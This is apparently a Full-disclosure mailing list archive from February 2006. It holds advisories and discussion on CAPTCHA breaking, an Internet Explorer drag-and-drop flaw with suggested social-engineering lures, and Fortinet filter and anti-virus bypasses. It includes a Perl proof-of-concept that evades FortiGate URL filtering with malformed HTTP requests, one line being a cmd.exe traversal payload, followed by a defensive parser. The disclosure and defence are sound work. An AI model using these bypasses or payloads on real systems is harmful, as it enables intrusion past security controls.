> them and have a human name each one once. And of
> course, this has the danger that a user can be left saying: "WTF? Is
> that an antelope or a gazelle?"


  You're right, I don't like the idea of having a database of all the
possible answers, and the antelope/gazelle thing certainly got me pissed
on the captcha site. When I tested it, first it was a couple of bugs (I
found neither insect nor bug in the list), then it was umbrellas with an
exception picture - it was more like a pain in the ass, a computer would
have better luck by going through the option list :P


  Eagerly waiting for examples,
php0t


PS: these are what I found on Google about the subject. They're nice,
but 1) they contain no code / tryout option, and 2) some of them only
focus on solving certain captchas (as I previously said, *some* apps,
*some* tests...).

http://www.comp.leeds.ac.uk/fyproj/reports/0405/Rice.pdf
http://algoval.essex.ac.uk/rep/textloc/IjdarSpecialFinal.pdf
http://bhiv.com/2005/09/30/defeating-diggs-captcha/



[Full-disclosure] BackTrack developer edition

2006-02-13 Thread Fabrice Ndjidie
Hi all,

Does anyone have a link for downloading the "BackTrack developer edition"?

Best regards.

Re: [Full-disclosure] Need some advice for a new customer

2006-02-13 Thread Peter Besenbruch

> Here's the question:
>
> Should the company notify their customers of a POSSIBLE compromise of their
> data? I have been trying to convince them that they should operate as though
> the data is compromised. Is that the right position to take as a security
> consultant?


What would the consequence to their business be if the news of 
compromise came from a third party, and not the business itself? They 
need to get out front on this.

--
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky


Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Valdis . Kletnieks
On Mon, 13 Feb 2006 09:05:47 EST, Shyaam said:

> I am looking for ebooks and dumps for the Security Certified Network
> Professional and the Security Certified Network Associate. Kindly please do
> send any resources to my personal email or the group so that it would be
> helpful for everyone who are taking that cert.

The e-books are almost certainly copyrighted, and somebody is likely
expecting to be paid for them.  Keep that in mind as you pursue this
white-hat cert. ;)



Re: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal

2006-02-13 Thread Valdis . Kletnieks
On Mon, 13 Feb 2006 07:09:48 +0100, php0t said:

> the global solution against word recognition based challenges? If it was
> like that, it would mean that there is no way anybody could make an
> image generator that would change its success rate from 90% to 0%...

It's *really* *really* difficult to produce a graphic image of letters
and numbers that is still recognizable to a human but can't be beaten by
a good edge-detection algorithm.  For instance, you can "bleed" the edges
so that they're fuzzy - but then the human has a hard time telling if
it's an 'i' or an 'l', or an 'h' or a 'b' (and so on).

I suppose you *could* put up a picture of something, and ask "What is this
a picture of" - but then you need a sufficiently large library of images that
an attacker can't just download all of them and have a human name each one once.
And of course, this has the danger that a user can be left saying: "WTF? Is
that an antelope or a gazelle?"



[Full-disclosure] Need some advice for a new customer

2006-02-13 Thread Red Leg
Hi all.

I have recently acquired a new customer who had a new version of the sdbot
worm (it dropped a new exe file - one that hasn't been seen before they were
infected - in the system32 sub-directory) blow through every machine on their
network. The worm is definitely one of the sdbot.worm.gen variants. And,
yes, the computer that held their customer credit card info was definitely
infected. The I.T. people at this firm failed to patch, or even have a plan
to patch, the Windows OS.

Here's the question:

Should the company notify their customers of a POSSIBLE compromise of their
data? I have been trying to convince them that they should operate as though
the data is compromised. Is that the right position to take as a security
consultant?

Thanks for your advice and time to think about this.

Red





Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Gadi Evron

Thierry Zoller wrote:

> Dear Gadi Evron,
>
> Just a note Users of Secure-it were already protected against this as
> it blocks the shell.explorer interface since 2005:
>
> http://www.sniff-em.com  [Freeware]

Cool. Thanks. That's the most polite and non-evasive commercial plug-in 
I've seen in a while! :)


I mean that!


Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Shyaam
Dear All,
I am looking for ebooks and dumps for the Security Certified Network Professional and the Security Certified Network Associate. Kindly please do send any resources to my personal email or the group so that it would be helpful for everyone who is taking that cert.

 
Thank you so much. Your help is appreciated.
 
Kind Regards,
Shyaam

Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Thierry Zoller
Dear Gadi Evron,

Just a note Users of Secure-it were already protected against this as
it blocks the shell.explorer interface since 2005:

http://www.sniff-em.com  [Freeware]


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



[Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Gadi Evron

Matthew Murphy has just disclosed a vulnerability in Internet Explorer.

He will send his advisory later today, but as he is unable to right now, 
he asked me to email this for him.
[I didn't want to email the advisory itself as ALL CREDIT BELONGS TO HIM 
and I didn't want to take the credit away from him in any way. This is 
100% his work and his disclosure]


Microsoft decided to patch this only next year with SP3. As by now 6 
months have passed since Microsoft was contacted, Matthew alerted them ahead 
of time that he would make a public release on the 13th (today).


There have been several attempts to help Matthew and talk to Microsoft 
(including by me, as well as several others) and convince them this is 
indeed "bulletin-worthy" to avoid this public release.


This is not a critical vulnerability, as it requires user interaction. 
However, it is serious and shouldn’t be down-played.


Here are some interesting ways to exploit this using social engineering:
Scroll-bar, “smack the monkey”, moving naked girl (move mouse to make 
me...), web game, shopping list/wish list, “calibrate your mouse”, etc.


The advisory (and suggested work-around) can be found here:
http://www.securiteam.com/windowsntfocus/5MP0B0UHPA.html

In my opinion, this comes to prove 0days are USUALLY a "myth" (WMF being 
a good example of a real 0day), as this particular vulnerability has 
been known to me and some others for some time now awaiting public release.
Does anyone still think bad guys don't exploit (to whatever goals) a 
0day if it is out there?


Gadi.


[Full-disclosure] working of winpcap

2006-02-13 Thread yogesh choubey
Hi Aditya,

I am Yogesh; I want to know more about winpcap. How does it work? Even
after reading the winpcap site, I am not able to get deeper into it.
Please help me by providing some document.

Thanks & Regards
Yogesh Kumar 



[Full-disclosure] Latest wu-ftpd exploit :-s

2006-02-13 Thread Mark Heiligen
http://www.frsirt.com/exploits/08.11.0x82-wu262-advanced.c.php


[Full-disclosure] Re: blocking Google Desktop

2006-02-13 Thread mamo
On 2/11/06, Randall M <[EMAIL PROTECTED]> wrote:
> You keep saying version 4, but we are at 3. The above just places google in
> the low in file swaping realm. This scares me for security reasons.

Sorry... but the latest version I can download from the
desktop.google.com web site is version 2. Am I missing something or
did they remove the new version from the website?

Best Regards.
 Mamo


[Full-disclosure] [SECURITY] [DSA 969-1] New scponly packages fix potential root vulnerability

2006-02-13 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

--------------------------------------------------------------------------
Debian Security Advisory DSA 969-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 13th, 2006 http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: scponly
Vulnerability  : design error
Problem type   : local
Debian-specific: no
CVE ID : CVE-2005-4532
Debian Bug : 344418

Max Vozeller discovered a vulnerability in scponly, a utility to
restrict user commands to scp and sftp, that could lead to the
execution of arbitrary commands as root.  The system is only vulnerable
if the program scponlyc is installed setuid root and if regular users
have shell access to the machine.

The old stable distribution (woody) does not contain an scponly package.

For the stable distribution (sarge) this problem has been fixed in
version 4.0-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 4.6-1.

We recommend that you upgrade your scponly package.


Upgrade Instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

  Source archives:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1.dsc
  Size/MD5 checksum:  600 ef0e45e07cfdd80fd53c0d3cd3daa31e

http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1.diff.gz
  Size/MD5 checksum:27012 96ee81daa1b248fe679106a9d9986b1b

http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0.orig.tar.gz
  Size/MD5 checksum:85053 1706732945996865ed0cccd440b64fc1

  Alpha architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_alpha.deb
  Size/MD5 checksum:31270 662c573abf24bf1094e939b89acd5575

  AMD64 architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_amd64.deb
  Size/MD5 checksum:30254 5db48bd53f0ca4fea76091221ceee6ac

  ARM architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_arm.deb
  Size/MD5 checksum:29046 95081c9ab7115b06f4b370bf8ecadae6

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_i386.deb
  Size/MD5 checksum:29356 1f2e8799c3c018c17734665f2610bef2

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_ia64.deb
  Size/MD5 checksum:33144 887025e1e4ff759edd4f69005c6c2b3b

  HP Precision architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_hppa.deb
  Size/MD5 checksum:30262 f721669ee692a8b21d975912a0a67f56

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_m68k.deb
  Size/MD5 checksum:29002 e7d63e25636483f8437b57d897fcd1b3

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_mips.deb
  Size/MD5 checksum:38582 995a79aab6d2ed7ab4bc37b921462a9e

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_mipsel.deb
  Size/MD5 checksum:38564 95bbff4502021a1a53f45c014fca20e2

  PowerPC architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_powerpc.deb
  Size/MD5 checksum:29702 60138f788f40ba7ffc35de22f7bb39cc

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_s390.deb
  Size/MD5 checksum:30060 340a4ed4effca8e9e27643789ea300c9

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_sparc.deb
  Size/MD5 checksum:29302 404579837618ae530847774aab4227a3


  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/


[Full-disclosure] URL filter bypass in Fortinet

2006-02-13 Thread Mathieu Dessus
URL filter bypass in Fortinet


Severity:           Low
Impact:             Bypass Fortinet web filter
Vulnerability type: Design error
Affected products:  FortiGate v2.8
CVE reference:      CAN-2005-3058


Vulnerability Description:
-

It is possible to bypass the Fortinet URL blocker by making special HTTP requests:
- if each line of the request is terminated by CR instead of CRLF
- if there's no Host field in an HTTP/1.0 request

These requests are "tolerated" by the HTTP RFC 2616, par. 19.3, and most
web servers reply to them; however, Fortinet failed to parse such URLs.


This bug was tested on FortiOS v2.8MR10 and v3beta.
The IPS module is not affected by this vulnerability.


Exploit:
---

See the Perl script below.


Solution:


No solution available yet.


Vendor Response:
---

08/11/2005 The vendor was contacted (using the support web site), and a
Perl script for reproducing the problem was provided.
08/16/2005 The vendor asked for more information.
08/18/2005 Network dumps and explanations sent to the vendor.
08/25/2005 The vendor said this was escalated to the dev team.
01/04/2006 Status requested from the vendor.
02/06/2006 The vendor was informed that this information would be
published in 1 week.

Credits:
---

Discovered by Mathieu Dessus (mdessus(a)gmail.com).

_

Perl script for testing the vuln:

# http_req.pl
#
# Made by (Mathieu Dessus)
#
# Make a filter for /test* URL in the Fortigate and
# remove the # depending on which HTTP request you want to test

use IO::Socket;

$target = '1.2.3.4';

# Detected
$data = "GET /test HTTP/1.1\r
Host: $target\r
Pragma: no-cache\r
Accept: */*\r
\r
";
# Not detected
$data = "GET /test2 HTTP/1.1
Host: $target
Pragma: no-cache
Accept: */*

";

# Not detected
$data = "GET /test3 HTTP/1.0\r\n\r\n";
# Detected
#$data = "GET /test4 HTTP/1.0\r\nHost: $target\r\n\r\n";
# Detected :)
#$data = "GET //c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";


my $sock = new IO::Socket::INET (
  PeerAddr => $target,
  PeerPort => '80',
  Proto => 'tcp',
 );
die "Could not create socket: $!\n" unless $sock;
print $sock $data;
read($sock, $ret, 600);
print($ret."\n");
close($sock);
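
Added here as an illustration of the defender-side lesson, not part of Mathieu's script or of FortiOS: a URL filter has to frame HTTP at least as leniently as the servers behind it. RFC 2616 section 19.3 tells recipients to tolerate a bare LF as a line terminator; the Python parser below also accepts a bare CR and takes the path from the request line itself, so an HTTP/1.0 request with no Host header is still checked against the block list. The sample requests mirror the cases in the advisory and are constructed; 192.0.2.10 stands in for the filtered server.

```python
import re

# Any of CRLF, bare CR or bare LF ends a line; CRLF is tried first so it
# is consumed as one terminator rather than as an empty line.
LINE_BREAK = re.compile(rb"\r\n|\r|\n")


def split_request_head(raw):
    """Return (request_line, header_lines). The head ends at the first
    empty line; the body, if any, is not needed for URL filtering."""
    head = []
    for line in LINE_BREAK.split(raw):
        if line == b"":
            break
        head.append(line)
    if not head:
        raise ValueError("empty request")
    return head[0], head[1:]


def parse_request(raw):
    """Parse method, target, version and headers (names lower-cased)."""
    request_line, header_lines = split_request_head(raw)
    parts = request_line.split()
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % request_line)
    method, target, version = (p.decode("latin-1") for p in parts)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(b":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return {"method": method, "target": target, "version": version, "headers": headers}


def request_path(req):
    """Path component to match against the block list. Absolute-form
    targets (proxy requests) are reduced to their path."""
    target = req["target"]
    if target.lower().startswith(("http://", "https://")):
        pieces = target.split("/", 3)
        return "/" + pieces[3] if len(pieces) == 4 else "/"
    return target


def effective_url(req):
    """URL the filter would log. An HTTP/1.0 request may legitimately
    omit Host; that must not exempt it from the path check."""
    host = req["headers"].get("host", "[no-host]")
    return "http://%s%s" % (host, request_path(req))


def is_blocked(raw, blocked_prefixes):
    """True if the request path starts with a blocked prefix. A request
    the parser cannot make sense of is blocked as well: failing open on
    unusual framing is exactly the gap the advisory describes."""
    try:
        req = parse_request(raw)
    except ValueError:
        return True
    path = request_path(req)
    return any(path.startswith(p) for p in blocked_prefixes)


# Constructed requests mirroring the cases in the advisory; 192.0.2.10 is
# a documentation address standing in for the filtered web server.
TARGET = b"192.0.2.10"
SAMPLES = {
    "crlf":    b"GET /test HTTP/1.1\r\nHost: " + TARGET + b"\r\nPragma: no-cache\r\nAccept: */*\r\n\r\n",
    "lf_only": b"GET /test2 HTTP/1.1\nHost: " + TARGET + b"\nPragma: no-cache\nAccept: */*\n\n",
    "cr_only": b"GET /test2 HTTP/1.1\rHost: " + TARGET + b"\rPragma: no-cache\rAccept: */*\r\r",
    "no_host": b"GET /test3 HTTP/1.0\r\n\r\n",
    "proxy":   b"GET http://" + TARGET + b"/test5 HTTP/1.1\r\nHost: " + TARGET + b"\r\n\r\n",
    "allowed": b"GET /index.html HTTP/1.1\r\nHost: " + TARGET + b"\r\n\r\n",
}


def check_all(blocked_prefixes=("/test",)):
    """Map each sample name to whether the filter blocks it."""
    return {name: is_blocked(raw, blocked_prefixes) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, blocked in check_all().items():
        print("%-8s %s" % (name, "BLOCKED" if blocked else "allowed"))
```

Requests the parser cannot frame are blocked rather than passed, which is the fail-closed choice; the `proxy` sample shows the absolute-form target that a filter sitting in front of a proxy also has to reduce to a path before the block list means anything.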


[Full-disclosure] Bypass Fortinet anti-virus using FTP

2006-02-13 Thread Mathieu Dessus
Bypass Fortinet anti-virus using FTP


Severity:           Low
Impact:             Bypass Fortinet anti-virus
Vulnerability type: Design error
Affected products:  FortiGate v2.8
CVE reference:      CAN-2005-3057


Vulnerability Description:
-

It is possible to bypass the Fortinet anti-virus engine when sending
files over FTP under certain conditions. Those conditions will be
disclosed later since Fortinet has not fixed the problem yet.

This bug was tested on FortiOS v2.8MR10 and v3beta.


Solution:


No solution yet.


Vendor Response:
---

07/28/2005 Vendor was first contacted by mail.
07/28/2005 They replied to use their support web site to re-enter the information.
08/01/2005 The vendor asked for more information, which was provided
the same day.
08/04/2005 The vendor replied that they had reproduced the problem.
01/04/2006 Status requested from the vendor.
02/06/2006 The vendor was informed that this information would be
published in 1 week.

Credits:
---

Discovered by Mathieu Dessus (mdessus(a)gmail.com).